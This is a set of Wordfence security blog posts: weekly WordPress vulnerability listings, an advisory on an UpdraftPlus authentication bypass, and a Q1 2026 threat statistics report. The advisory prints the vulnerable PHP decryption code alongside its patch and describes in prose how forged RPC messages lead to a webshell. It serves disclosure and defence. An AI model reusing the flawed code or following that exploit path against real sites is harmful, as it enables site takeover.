Muhan Luo

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8611

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Klamra Paycal for Aspaclaria [klamra-paycal-for-aspaclaria]

Researcher

KEVIN LEE (crattack)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9722

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Laiser Tag [laiser-tag]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9719

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

LatePoint – Calendar Booking Plugin for Appointments and Events [latepoint]

Researcher

Kirasec

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9008

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

Page-list [page-list]

Researcher

darkmode

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-34892

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Rank Math SEO – AI SEO Tools to Dominate SEO Rankings [seo-by-rank-math]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-48969

Patch Status
Patched

Published
Jun 3, 2026

Affected Software

Really Simple Security – Simple and Performant Security (formerly Really Simple SSL) [really-simple-ssl]

Researcher

Evan NR

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8422

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Remove meta boxes per user role [remove-meta-boxes-per-user-role]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9730

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Remove NoFollow Commenter URL [remove-nofollow-commenter-link]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8976

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator [feedzy-rss-feeds]

Researcher

Jack Pas (Dark.)

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-7624

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

SEO Plugin by Squirrly SEO [squirrly-seo]

Researcher

Abi Wiranata

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9050

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Slider Revolution [revslider]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9048

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Slider Revolution [revslider]

Researcher

Prickly Cactus

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-42378

Patch Status
Patched

Published
Jun 1, 2026

Affected Software

Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations & Subscriptions [wp-full-stripe-free]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-9599

Patch Status
Unpatched

Published
Jun 1, 2026

Affected Software

Tectite Forms [tectite-forms]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-48878

Patch Status
Patched

Published
Jun 2, 2026

Affected Software

Visual Link Preview [visual-link-preview]

Researcher

Aliefis

CVSS Rating
3.8 (Low)

CVE-ID

CVE-2025-12656

Patch Status
Patched

Published
Jun 5, 2026

Affected Software

WPvivid — Backup, Migration & Staging [wpvivid-backuprestore]

Researcher

blue0x1

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our Bug Bounty Program, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (June 1, 2026 to June 7, 2026) appeared first on Wordfence.

Critical Unauthenticated Authentication Bypass Vulnerability Patched in UpdraftPlus WordPress Plugin

Simon Browning — Wed, 10 Jun 2026 18:39:03 +0000

On June 2nd, 2026, we received a submission for a critical Unauthenticated Authentication Bypass vulnerability in UpdraftPlus, a WordPress plugin with more than 3 million active installations. Although the plugin has such a large install base, the vulnerability is only exploitable on sites that have previously been connected to UpdraftCentral, the plugin’s remote site management dashboard. On affected sites, this vulnerability allows unauthenticated attackers to run arbitrary Remote Procedure Calls (RPC) as the connected administrator, for example, uploading and activating a malicious plugin, resulting in arbitrary PHP code execution and complete site compromise.

Props to vtim who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. This researcher earned a bounty of $5,200.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to the multi-layered approach to security.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 3, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on July 3, 2026.

We provided full disclosure details to the UpdraftPlus team through our Wordfence Vulnerability Management Portal on June 3, 2026. The developer acknowledged the report on June 4, 2026, and released the fully patched version on June 5, 2026. We would like to commend the UpdraftPlus team for their prompt response and timely patch.

We urge users to update their sites to the latest patched version of UpdraftPlus as soon as possible.

Vulnerability Summary from Wordfence Intelligence

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-10795

Affected Version(s)
<= 1.26.4

Patched Version
1.26.5

Affected Software

UpdraftPlus: WP Backup & Migration Plugin [updraftplus]

Researcher

vtim

The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.26.4 via the UpdraftPlus_Remote_Communications_V2::wp_loaded function. This is due to insufficient validation of the remote communications message format, where signature verification can be bypassed and unchecked decryption return values collapse to a predictable all-zero encryption key. This makes it possible for unauthenticated attackers to forge arbitrary RPC commands and run them as the connected administrator, such as uploading and activating a malicious plugin, which ultimately leads to remote code execution.

Technical Analysis

UpdraftPlus is a popular WordPress plugin for creating backups, as well as migration, and remote site management. It optionally integrates with UpdraftCentral, a centralized site management dashboard available both as a hosted cloud service and as a self-hosted product, allowing administrators to manage multiple WordPress sites from a single interface.

To support this integration, UpdraftPlus bundles a remote communications library that, once a site has been connected to UpdraftCentral, registers an unauthenticated RPC listener on every page load. This listener accepts POST requests containing a serialized udrpc_message and dispatches the decoded command on behalf of the connecting administrator.

Once the listener has decided to process the message, it calls the decrypt_message() function from the UpdraftPlus_Remote_Communications_V2 class, which extracts the base64-encoded encrypted symmetric key portion from the message, attempts to decrypt it with the site’s local RSA private key, and then uses the result directly as the AES key for decrypting the message body.

public function decrypt_message($message) {

	if (!$this->key_local) throw new Exception('No decryption key has been set');

	$rsa = new phpseclib_Crypt_RSA();
	if (defined('UDRPC_PHPSECLIB_ENCRYPTION_MODE')) $rsa->setEncryptionMode(UDRPC_PHPSECLIB_ENCRYPTION_MODE);
	// Defaults to CRYPT_AES_MODE_CBC
	$rij = new phpseclib_Crypt_Rijndael();

	// Extract the Symmetric Key
	$len = substr($message, 0, 3);
	$len = hexdec($len);
	$sym_key = substr($message, 3, $len);

	// Extract the encrypted message
	$cipherlen = substr($message, ($len + 3), 16);
	$cipherlen = hexdec($cipherlen);

	$ciphertext = substr($message, ($len + 19), $cipherlen);
	$ciphertext = base64_decode($ciphertext);

	// Decrypt the encrypted symmetric key
	$rsa->loadKey($this->key_local);
	$sym_key = base64_decode($sym_key);
	$sym_key = $rsa->decrypt($sym_key);

	// Decrypt the message
	$rij->setKey($sym_key);

	return $rij->decrypt($ciphertext);

}

Unfortunately, the function does not check the return value of $rsa->decrypt(). When the supplied encrypted key is malformed, phpseclib’s RSA::decrypt() returns false rather than throwing an exception. Passing false to Rijndael::setKey() collapses to a deterministic cipher with an all-zero AES-128 key, an all-zero initialization vector, and PKCS7 padding. An attacker can reproduce this exact configuration locally, encrypt a message of their choosing, and have the server successfully decrypt it without ever needing access to the site’s keys.

This means that an unauthenticated attacker can craft a fully forged udrpc_message that the listener accepts and dispatches as if it had been signed and encrypted by the connected UpdraftCentral dashboard.

When the dispatcher hands the message off to the UpdraftCentral listener in UpdraftCentral_Listener::udrpc_action(), it calls wp_set_current_user() with the user ID of the administrator who originally connected the site to UpdraftCentral. From that point on, every WordPress capability check sees the request as coming from a fully authenticated administrator.

UpdraftPlus implements a number of powerful RPC commands, for example, plugin.upload_plugin, which writes an arbitrary plugin ZIP to disk via file_put_contents() and installs it through Plugin_Upgrader::install(), and plugin.activate_plugin, which activates the newly installed plugin. By uploading a plugin that contains a simple PHP webshell, an attacker can gain arbitrary PHP and operating system command execution.

The Patch

The vendor addressed this issue by adding a return-value check to the decrypt_message() function.

public function decrypt_message($message) {

	if (!$this->key_local) throw new Exception('No decryption key has been set');

	$rsa = new phpseclib_Crypt_RSA();
	if (defined('UDRPC_PHPSECLIB_ENCRYPTION_MODE')) $rsa->setEncryptionMode(UDRPC_PHPSECLIB_ENCRYPTION_MODE);
	// Defaults to CRYPT_AES_MODE_CBC
	$rij = new phpseclib_Crypt_Rijndael();

	// Extract the Symmetric Key
	$len = substr($message, 0, 3);
	$len = hexdec($len);
	$sym_key = substr($message, 3, $len);

	// Extract the encrypted message
	$cipherlen = substr($message, ($len + 3), 16);
	$cipherlen = hexdec($cipherlen);

	$ciphertext = substr($message, ($len + 19), $cipherlen);
	$ciphertext = base64_decode($ciphertext);

	// Decrypt the encrypted symmetric key
	$rsa->loadKey($this->key_local);
	$sym_key = base64_decode($sym_key);
	$sym_key = $rsa->decrypt($sym_key);

	if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
		return false;
	}

	// Decrypt the message
	$rij->setKey($sym_key);

	return $rij->decrypt($ciphertext);

}

Wordfence Firewall

The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

Disclosure Timeline

June 1, 2026 – We received the submission for the Unauthenticated Authentication Bypass vulnerability in UpdraftPlus via the Wordfence Bug Bounty Program.
June 3, 2026 – We validated the report and confirmed the proof-of-concept exploit. Full disclosure details were sent instantly to the vendor through our Wordfence Vulnerability Management Portal.
June 3, 2026 – Wordfence Premium, Care, and Response users received a firewall rule to provide added protection against any exploits that may target this vulnerability.
June 4, 2026 – The vendor acknowledged the report and began working on a fix.
June 5, 2026 – The fully patched version of the plugin, 1.26.5, was released.
July 3, 2026 – Wordfence Free users will receive the same protection.

Conclusion

In this blog post, we detailed a critical Unauthenticated Authentication Bypass vulnerability within the UpdraftPlus plugin affecting all versions up to, and including, 1.26.4. This vulnerability allows unauthenticated threat actors to execute arbitrary code on the server when the site has previously been connected to an UpdraftCentral dashboard, by combining a bypassable signature check with a failed-decryption fallback that collapses to a deterministic all-zero AES key. The vulnerability has been fully addressed in version 1.26.5 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of UpdraftPlus as soon as possible considering the critical nature of this vulnerability.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

The post Critical Unauthenticated Authentication Bypass Vulnerability Patched in UpdraftPlus WordPress Plugin appeared first on Wordfence.

Quarterly WordPress Threat Intelligence Report – Q1 2026

Simon Browning — Thu, 04 Jun 2026 21:42:49 +0000

As the leader in WordPress security, Wordfence provides unparalleled security coverage that fully encompasses protection, active monitoring, detection, and response all built around our threat intelligence, demonstrating a strong commitment to security. Our mission is to ensure comprehensive defense-in-depth for every layer of a WordPress website’s security.

It’s important to understand that a complete security solution requires both protection and detection; while protection is crucial for preventing initial compromises, detection is equally vital for a wholesome WordPress site security strategy.

There’s a Wordfence Option for Every Site Owner

Whether you run a personal blog or manage hundreds of client websites, Wordfence has a plan tailored to your needs:

Wordfence Free – Industry-leading Web Application Firewall (WAF) blocking 95% of known threats out of the box, malware scanning, Two-Factor Authentication (2FA), and more. 30-day delay on malware signatures and new firewall rules.

Wordfence Premium – Real-time firewall and malware signature updates, plus powerful tools like an audit log for deeper insight and monitoring.

Wordfence Care – Around-the-clock monitoring by our team, hands-on remediation if something goes wrong, and priority support for true peace of mind.

Wordfence Response – All the benefits of Wordfence Premium and Care with one hour response times for immediate remediation of security breaches.

Compare Plans

This regular report highlights trends and changes in the WordPress security landscape, empowering you as a site owner to proactively protect your website against current vulnerabilities and threats, and to better understand the protections Wordfence provides through it’s robust threat intelligence.

Threat Intelligence Key Highlights Q1 2026

As the industry leader in WordPress security we have access to attack telemetry and vulnerability intelligence that no other security provider can compare to. We know exactly what vulnerabilities will become a target for threats, what the biggest threats to WordPress are, and how to prioritize remediation and protection against WordPress. The following presents some key highlights of WordPress threats and vulnerabilities in Q1 2026.

Total Vulnerabilities Published

2,738

+23.7% from previous quarter

High Threat Vulnerabilities

158

+20.6% from previous quarter

Common & Dangerous Vulnerabilities

198

+98.0% from previous quarter

WAF Attacks Blocked

9.1B

-0.3% from previous quarter

Brute Force Attacks Blocked

16.0B

+15.3% from previous quarter

Sites Infected

474K

+1.4% from previous quarter

What this means for site owners: Keep plugins and themes updated regularly, enable 2FA, run regular security scans, follow strong password security, and rely on a WAF like Wordfence for protection before vulnerabilities are patched and continuous monitoring.

Wordfence Vulnerability Intelligence Highlights for Q1 2026

This section breaks down the vulnerabilities disclosed in Q1 2026 along with highlighting any trends or changes from the previous quarter.

The Wordfence Bug Bounty Program’s primary mission is to attract the highest quality vulnerability research in the WordPress space based on high impact and high severity vulnerabilities that are the most likely to be exploited. Due to this, you can rest assured knowing that you have the best protection available for vulnerabilities that pose the most significant risk to your site before they are even disclosed to the vendor.

Did you know? Wordfence provides the most comprehensive vulnerability intelligence for WordPress, with over 29,000 known vulnerabilities cataloged in our database. Our team adds dozens to hundreds of new vulnerabilities every week, ensuring the Wordfence plugin’s vulnerability scanner, and our free Vulnerability Intelligence API, alert you the moment a new vulnerability is detected.

Total Vulnerabilities Published

2,738

+23.7% from previous quarter

Total WAF Rules Released

+10.0% from previous quarter

Total Vulnerabilities Published

In Q1, there were 2,738 vulnerabilities added to the Wordfence Intelligence vulnerability database. Wordfence was responsible for remediating and disclosing 37.2% of the total. The following chart highlights the trend in new vulnerabilities disclosed over this period.

Total High Threat Vulnerabilities Published

In Q1, there were 158 high threat vulnerabilities added to the Wordfence Intelligence vulnerability database. These vulnerabilities pose the most significant threat to WordPress websites as attackers are very likely to target them in the real-world, and they can generally lead to full site compromise with minimal requirements. Often generic, or non-WordPress specific firewalls do not provide adequate protection against these vulnerabilities. Wordfence was the source of disclosure for 46.8% of those vulnerabilities, highlighting how the Wordfence firewall can provide you with the fastest protection for WordPress vulnerabilities that pose the most significant risk to your WordPress site.

Total Common and Dangerous Vulnerabilities Published

In Q1, there were 198 common and dangerous vulnerabilities added to the Wordfence Intelligence vulnerability database. Wordfence was responsible for remediating and disclosing 44.4% of these common and dangerous vulnerabilities. These vulnerabilities are some of the most commonly found in WordPress plugins and themes, but are still prime targets for attackers who are looking for low hanging fruit to exploit.

Patch Status of Reported Vulnerabilities

At the end of Q1, there were 747 vulnerabilities that remained unpatched. This highlights the importance of utilizing a security scanner like Wordfence that will alert you when an unpatched vulnerability is present on your site so you can take remedial action, like removing the software, immediately.

Install Count Distribution of Affected Software

The following highlights the average distribution of install counts for software affected by vulnerabilities reported in this quarter.

Authentication Level To Exploit Distribution

Most vulnerabilities disclosed in Q1 required unauthenticated access to exploit. This is the same as from Q4 2025 where was required to exploit for the majority of vulnerabilities published.

Affected Software Type Distribution (Plugins/Themes/Core)

As usual, the majority of the vulnerabilities disclosed in Q1 were plugin related vulnerabilities.

Top 10 Vulnerability Classes Published

The following highlights the most commonly published vulnerabilities in Q1 2026.

Vulnerability Type	Total Vulns
CWE 862: Missing Authorization	753
CWE 79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)	736
CWE 98: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)	349
CWE 89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)	147
CWE 352: Cross-Site Request Forgery (CSRF)	129
CWE 502: Deserialization of Untrusted Data	106
CWE 200: Exposure of Sensitive Information to an Unauthorized Actor	84
CWE 639: Authorization Bypass Through User-Controlled Key	77
CWE 22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)	58
CWE 918: Server-Side Request Forgery (SSRF)	52

Vendors Registered for the Vulnerability Management Portal

This quarter, we had 151 vendors sign up to manage their WordPress software’s security through the Vulnerability Management Portal (-24.9% from previous quarter). This covers 554 distinct plugins and themes (-60.2% from previous quarter). Vendors who register for the Wordfence Vulnerability Management Portal demonstrate a strong commitment to WordPress security as they are notified in real-time when a new vulnerability has been discovered or reported in their software. If you’re a WordPress vendor and you’d like to sign up for real-time vulnerability alerts and centralized vulnerability management, get started here.

Wordfence Threat Intelligence Summary for Q1 2026

This section highlights the past quarter’s trend among vulnerabilities attackers are targeting and password attacks they are initiating.

Threat intelligence is at the heart of Wordfence’s industry-leading security solutions. As the largest security provider for WordPress, we collect and analyze attack telemetry from millions of sites worldwide. This unparalleled visibility gives us real-time insight into what attackers are targeting and when, empowering us to deliver the fastest and most effective protection for WordPress.

Web Application Firewall (WAF) Attack Data Highlights

Did you know? Wordfence leverages attack telemetry from over 5 million protected websites to continuously strengthen the security features of the Wordfence plugin. Sites running Wordfence Premium, Care, or Response automatically block IP addresses actively engaged in malicious activity across WordPress, even when those attacks don’t target a known vulnerability, keeping your site safe from the latest and emerging threats.

WAF Rule Requests Blocked/Logged

9.1B

-0.3% from previous quarter

Blocked From IP Threat Feed

3.4B

+42.5% from previous quarter

Total WAF Rules Released

+10.0% from previous quarter

Unique IPs in WAF Attacks

16.9M

+35.3% from previous quarter

Unique IPs From Blocklist

222K

+19.8% from previous quarter

Unique User Agents

20.0M

-8.1% from previous quarter

Total Requests Blocked and Logged by the Wordfence Firewall Over Q1

The following chart highlights how many exploit and probing requests the Wordfence Firewall has blocked over the course of Q1.

Top 10 User Agents Engaged in Exploiting Vulnerabilities

The following chart highlights the top 10 user agents that have been used in exploit and enumeration attempts across the network of sites we protect.

Total Requests	User Agents
882,234,754	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
828,547,430	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
456,134,596	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
333,417,068	curl/8.7.1
299,508,291	curl/8.7.1
276,445,415	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
213,287,827	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
169,342,546	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
83,261,420	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
81,694,416	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Top 10 Unique Vulnerabilities Targeted by Attackers

The following section highlights the top 10 unique vulnerabilities being targeted by attackers.

Vulnerability	Total Blocked Requests
SureTriggers <= 1.0.78 – Authorization Bypass due to Missing Empty Value Check to Unauthenticated Administrative User Creation	10,236,067
WooCommerce Payments 4.8.0 – 5.6.1 Authentication Bypass and Privilege Escalation	6,729,865
Rank Math SEO <= 1.0.40.2 – Privilege Escalation via Unprotected REST API Endpoint	6,211,916
Gwolle Guestbook <= 1.5.3 – Remote File Inclusion	5,809,543
WP Freeio <= 1.2.21 – Unauthenticated Privilege Escalation	4,364,204
Discount Rules for WooCommerce <= 2.0.2 – Missing Authorization	4,140,826
FULL – Customer <= 2.2.3 – Authenticated(Subscriber+) Improper Authorization to Arbitrary Plugin Installation	3,649,846
Alone Theme <= 7.8.3 – Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation	3,201,677
HT Mega – Absolute Addons for Elementor <= 2.2.0 – Missing Authorization to Privilege Escalation	3,193,007
Hunk Companion <= 1.8.4 – Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation	2,596,259

Top 10 Attacking Countries

The following section highlights the top 10 countries engaged in initiating attacks against WordPress websites.

Top 10 Attacking IP Addresses

The following are the top 10 IP Addresses engaged in targeting WordPress website vulnerabilities.

IP Address	Total Requests
185.177.72.49	71,304,777
185.177.72.22	71,162,291
185.177.72.51	70,526,116
185.177.72.13	70,515,278
185.177.72.56	70,477,684
185.177.72.38	70,331,546
185.177.72.30	69,897,007
185.177.72.52	69,837,067
185.177.72.23	68,446,916
64.188.91.57	43,313,511

Top 5 “Generic” Vulnerability Types Targeted By Attackers

This section highlights the most attacked common vulnerability types.

Password Attacks Data Highlights

Did you know? Wordfence includes a robust suite of password protection features, all available in the free version of the plugin. Features like Two-Factor Authentication (2FA), blocking logins using known compromised passwords, and preventing brute-force login attempts help safeguard your WordPress users and administrators from unauthorized access.

Brute Force Attacks Blocked

16.0B

+15.3% from previous quarter

Unique IPs in Brute Force

68.1M

+66.4% from previous quarter

Avg Requests Per IP

234

-30.8% from previous quarter

Total Password Attacks Blocked by the Wordfence Firewall Over Q1

The following chart highlights how many password attacks the Wordfence Firewall has blocked over the course of Q1.

Top 10 Countries with the Most Distinctly Unique IP Addresses Engaged in Password Attacks

The following chart highlights countries with the most unique IP addresses originating from them engaged in password attacks.

Top 10 Countries with the Highest Volume of Password Attacks Blocked

While the above chart highlights countries with the most unique IP Addresses targeting them. The following chart highlights countries with the most password attack activity based on number of requests, rather than distinctly unique IP Addresses.

Password Attacks Blocked by Type

This section highlights what password attack techniques are the most common.

Wordfence Malware Intelligence Report for Q1 2026

This section highlights common trends and patterns in malware attack data across the sites Wordfence protects.

No security solution would be complete without malware detection or scanning. It’s a critical element to website security that if your site gets hacked, it gets detected so that you can take swift remedial action to protect your business and brand reputation.

Did you know? Wordfence’s Malware Signatures are used to provide protection on your site. They are not just used for detecting a compromise, they are also used for blocking uploads of malicious files that match our malware signatures through the Wordfence Firewall.

Malware Attack Data Highlights

Unique Malware Files

27.4M

+100% from previous quarter

Malware Signatures Released

+100% from previous quarter

Sites with Malware

474K

+100% from previous quarter

Avg Infected Files Per Site

51.8

-5.8% from previous quarter

Avg Malware Variations Per Site

2.4

-7.7% from previous quarter

Number of Distinct Sites With Malware Detected Over Q1

The following chart highlights the average amount of sites with at least once piece of malware detected over the course of Q1.

Malware Detected by File Type

The following chart highlights the most commonly detected malware based on file type. PHP files are often associated with webshells, backdoors, infostealers, and skimmers while files like JavaScript and HTML are often associated with spam.

Malware Detected Based on Uploaded Location

The following chart highlights where malware is most commonly uploaded.

Report Archives for Q1 2026

Access the complete collection of detailed vulnerability and bug bounty reports published during Q1 2026. These archives provide comprehensive documentation of all security issues identified and addressed throughout the quarter.

Weekly Vulnerability Report Archive

In case you missed any of the weekly vulnerability reports from Q1, you can find the complete list of them here:

Wordfence Intelligence Weekly WordPress Vulnerability Report (December 15, 2025 to January 4, 2026): https://www.wordfence.com/blog/2026/01/wordfence-intelligence-weekly-wordpress-vulnerability-report-december-15-2025-to-january-4-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (January 5, 2026 to January 11, 2026): https://www.wordfence.com/blog/2026/01/wordfence-intelligence-weekly-wordpress-vulnerability-report-january-5-2026-to-january-11-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (January 12, 2026 to January 18, 2026): https://www.wordfence.com/blog/2026/01/wordfence-intelligence-weekly-wordpress-vulnerability-report-january-12-2026-to-january-18-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (January 19, 2026 to January 25, 2026): https://www.wordfence.com/blog/2026/01/wordfence-intelligence-weekly-wordpress-vulnerability-report-january-19-2026-to-january-25-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (January 26, 2026 to February 1, 2026): https://www.wordfence.com/blog/2026/02/wordfence-intelligence-weekly-wordpress-vulnerability-report-january-26-2026-to-february-1-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (February 2, 2026 to February 8, 2026): https://www.wordfence.com/blog/2026/02/wordfence-intelligence-weekly-wordpress-vulnerability-report-february-2-2026-to-february-8-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (February 9, 2026 to February 15, 2026): https://www.wordfence.com/blog/2026/02/wordfence-intelligence-weekly-wordpress-vulnerability-report-february-9-2026-to-february-15-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (February 16, 2026 to February 22, 2026): https://www.wordfence.com/blog/2026/02/wordfence-intelligence-weekly-wordpress-vulnerability-report-february-16-2026-to-february-22-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (February 23, 2026 to March 1, 2026): https://www.wordfence.com/blog/2026/03/wordfence-intelligence-weekly-wordpress-vulnerability-report-february-23-2026-to-march-1-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (March 2, 2026 to March 8, 2026): https://www.wordfence.com/blog/2026/03/wordfence-intelligence-weekly-wordpress-vulnerability-report-march-2-2026-to-march-8-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (March 9, 2026 to March 15, 2026): https://www.wordfence.com/blog/2026/03/wordfence-intelligence-weekly-wordpress-vulnerability-report-march-9-2026-to-march-15-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (March 16, 2026 to March 22, 2026): https://www.wordfence.com/blog/2026/03/wordfence-intelligence-weekly-wordpress-vulnerability-report-march-16-2026-to-march-22-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (March 23, 2026 to March 29, 2026): https://www.wordfence.com/blog/2026/04/wordfence-intelligence-weekly-wordpress-vulnerability-report-march-23-2026-to-march-29-2026/
Wordfence Intelligence Weekly WordPress Vulnerability Report (March 30, 2026 to April 5, 2026): https://www.wordfence.com/blog/2026/04/wordfence-intelligence-weekly-wordpress-vulnerability-report-march-30-2026-to-april-5-2026/

Monthly Bug Bounty Report Archive

If you missed any of the monthly Bug Bounty Program Reports from Q1, you can find those all here:

Conclusion: Key Takeaways For Site Owners

When it comes to securing your WordPress site, a defense-in-depth strategy is essential. No single solution can stop every attack, but by layering protection, detection, and active monitoring, you dramatically reduce your risk and increase your ability to respond quickly when threats emerge.

Protection

The first line of defense is preventing attacks from succeeding in the first place. A strong firewall, timely vulnerability patches, and hardened configurations help block malicious traffic before it ever reaches your site. By leveraging Wordfence’s threat intelligence, you’re protected against the latest exploits that attackers are actively using in the wild. This proactive protection ensures your site is guarded not just against known threats, but against emerging attack patterns.

Detection

Even the best defenses can be tested, which is why detection is critical. Comprehensive scanning helps identify vulnerabilities, malware, or suspicious changes on your site that could signal an attempted compromise. With Wordfence’s real-time scanning powered by global attack data, you gain visibility into threats that may have slipped past other layers of defense, allowing you to act before they cause serious damage.

Active Monitoring

Continuous monitoring serves as your early warning system. Real-time alerts about critical events, login attempts, and file changes help you stay ahead of threats. Wordfence’s comprehensive monitoring doesn’t just tell you something happened, it provides the context and intelligence you need to understand the severity and respond appropriately. This constant vigilance means you’re never flying blind when it comes to your site’s security posture.

Security isn’t a “set it and forget it” task. Active monitoring ensures your site is continuously observed for suspicious behavior, login attempts, and traffic anomalies. Attackers often probe sites for weaknesses over time; having real-time monitoring means you’ll know immediately if your site is being targeted. Wordfence’s monitoring tools provide alerts and insights so you can take swift action, whether that’s blocking an attacker, tightening access, or responding to a detected vulnerability.

By combining protection, detection, and monitoring, you create a strong defense-in-depth strategy for your WordPress site. Wordfence brings all three layers together in one solution, making it simple to secure your site and stay ahead of attackers. Install Wordfence today and put industry-leading security to work for you.

The post Quarterly WordPress Threat Intelligence Report – Q1 2026 appeared first on Wordfence.

Wordfence Intelligence Weekly WordPress Vulnerability Report (May 25, 2026 to May 31, 2026)

Simon Browning — Thu, 04 Jun 2026 15:38:30 +0000

Last week, there were 277 vulnerabilities disclosed in 184 WordPress Plugins and 70 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 94 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

New Firewall Rules Deployed Last Week

The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our Premium, Care, and Response customers last week:

Total Unpatched & Patched Vulnerabilities Last Week

Patch Status	Number of Vulnerabilities
Patched	131
Unpatched	146

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating	Number of Vulnerabilities
Low Severity	2
Medium Severity	159
High Severity	106
Critical Severity	10

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE	Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)	77
Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)	58
Missing Authorization	56
Cross-Site Request Forgery (CSRF)	19
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)	16
Deserialization of Untrusted Data	9
Authorization Bypass Through User-Controlled Key	6
Exposure of Sensitive Information to an Unauthorized Actor	6
Improper Privilege Management	5
Improper Control of Generation of Code (‘Code Injection’)	4
Incorrect Privilege Assignment	4
Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)	3
Unrestricted Upload of File with Dangerous Type	3
Improper Authentication	2
